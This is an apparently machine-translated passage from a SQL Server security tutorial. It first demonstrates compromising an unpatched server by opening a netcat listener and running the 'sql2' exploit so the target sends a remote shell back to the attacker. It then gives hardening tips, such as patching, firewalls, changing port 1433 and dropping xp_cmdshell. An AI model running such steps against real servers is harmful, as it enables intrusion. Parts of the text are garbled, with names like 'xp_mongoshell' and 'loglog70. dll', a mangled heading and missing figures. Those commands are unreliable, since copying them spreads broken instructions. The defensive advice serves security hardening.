Patches and suggestions for SQL Server security issues

　　Iii. SQL Server unpatched vulnerabilities

John's SQL Server is installed on Win 2000, with no patching and no patching, no matter how strict your permission settings are, they are all broken. The following example is an attack on the vulnerable SQL Server (installed on 192.168.113.10). Two tools are used in the experiment, NC and sql2, and NC alias Swiss Army knife, it is an ancient and powerful network tool. If you want to know the usage details, please refer to the relevant information on the Internet. sql2 is a specialized attack against the vulnerable SQL Serve (below SP2, including SP2 ), the process is as follows:

25. Run nc-l-P 77 in the Command window (run cmd) of my machine (whose IP address is 192.168.113.207), which means to open port 77 on the local machine.

Create a new command window and run sql2 192.168.113.10 192.168.113.207 77 0

If the SQL server on 192.168.113.10 has a vulnerability, the NC monitoring window of 192.168.113.207 will display a page of 26. Note! This interface is installed with the SQL Serve machine. In other words, we have intruded into this machine. Next, let's look at 27. The IP address used for ipconfig query is 192.168.113.10. It's under your control. That's easy!

Figure 25

Figure 26

Figure 27

　　Iv. Suggestions

1. Patch timely

The danger of not patching has been demonstrated above, so I don't have to say much about it!

2. The minimum permission is equal

This sentence is easy to say and difficult to start. One simple way is to use popular vulnerability scanning tools and attack tools to check whether the system is secure. There are many such tools. Find them by yourself.

3. Install a firewall

If you only debug the system on the local machine, installing the firewall is a good choice, so that no one else can attack even if there is a vulnerability.

4. Change the port

If SQL server requires remote access, the port must be open. Even if a firewall is installed, the SQL Server service port 1433 must be opened, the SQL Server attack tool mainly scans port 1433 and can change the default port. Although this does not fundamentally solve the problem, it can defend against normal scans, the easiest way to change the port is to open "start" --> "All Programs" --> "Microsoft SQL Serve" --> "server network utility ", select "TCP/IP" on the interface, click "properties", change "1433" to a value of no more than 65535, and restart the SQL Serve service. Then, the default port is changed, note that when you remotely connect to SQL Serve, you need to add the modified port number after the IP address.

5. Delete unnecessary Extended Stored Procedures

If you do not need these extended stored procedures in your system, you can delete them.

The command to delete a stored procedure is exec sp_dropextendedproc 'stored procedure name'

For example, if you want to delete xp_mongoshell and execute exec sp_dropextendedproc 'xp _ mongoshell ', each extended stored procedure actually uses the corresponding DLL file. If you want to completely disable the stored procedure, delete the DLL file. These files are generally stored in Program Files \ Microsoft SQL Server \ MSSQL \ binn, And the DLL file of xp_cmdshell is xplog70.dll.

To restore the stored procedure, run the following command:

Exec sp_addextendedproc name of the stored procedure, @ dllname = 'stored procedure dll'

Example: Restore Stored Procedure xp_mongoshell

Exec sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll '. Note that copy is required if xplog70.dll is deleted during restoration.